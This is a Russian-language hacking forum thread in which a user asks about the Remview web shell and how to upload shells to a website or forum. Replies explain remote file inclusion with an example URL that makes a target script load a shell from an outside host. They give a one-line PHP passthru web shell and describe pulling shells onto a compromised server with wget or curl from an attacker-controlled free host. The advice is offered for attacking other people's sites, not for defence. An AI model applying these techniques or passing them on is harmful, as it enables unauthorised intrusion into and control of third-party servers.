несколько вопросов - 1) одно ли это и тоже, али нет ? 2) если АЛИ НЕТ, то был бы благодарен за любое разъяснение 3) и как можно их залить на сайт/форум ? *не учитывая вариант со взломом админского акка и заливкой его *шелла/ремвью* через смайлы/темы и тд..
1)Ремвью является одним их многих видов шеллов,ответ ДА. 3)Способов достаточно... Например include баг,и ты можешь подключить свой сценарий,тоесть дать ссылу на сервер где лежит твой Ремвью.В результате чего ты сможешь залить любой шелл. Пример:www.anyhost.ru/**.php?=http://www.petrovich-lamer.narod.ru/remviev.php Есть в бажном скрипте указан что подключаемый файл *php,то просто www.anyhost.ru/**.php?=http://www.petrovich-lamer.narod.ru/remview Удачи и всё такое
вебшелов существует множество на разных яхыках програмирования от самого банального <? passthru("$cmd"); ?> до "монстров" типа nfm и Ремвью из их числа причем не самый лучший. залить также масса вариантов. способы зависит зависят от конкретой уязвимости ,например заливка с помошю другого более простого предварительно залитого шела того же passthru или уязвимостей типо remote command execution в этих случиях заливается с другого серва (например предварительно созданого тобой акка на халявном хосте ) с помощью какойнить установленной на атакуемой тачки качалки (wget,get,curl,fetch,lynx )узнать наличие которой можно командой which. А вообще смотри побольше видео там всё расжованно,не важно даже если описываемая уязвимость неактуальна,научишся многому и не будешь задавать подобных вопросов.
1. на вашь вопрос ответить нельзя, т.к. ремвью - руское название скрипта а шелл - с английского оболочка 2. шелл - как уже сказал оболочка. это может быть текст в песне, слово в учебнике за 7 класс, и какой-то вид доступа к серверу. смысл шелла в том что ты можешь каким-то образом управлять сервером. например SSH-шел - это запущеный на сервере sshd демон, а у тебя вдруг есть логин и пароль. или веб-шелл. один из часто используемых скриптов для "администрирования" сайта - remview.php (Remote View). Он то и дает веб шелл (тоесть возможность выполнять команды, читать директории и файлы). Ненадо путать слова.
хех, КЕЗ, ну я спросил для ознакомления... терь знаю, что Шелл - это сам процесс выполнения команд (типа доступ), А ремвью - php скрипт, позволяющий реализовать такую возможность так ?
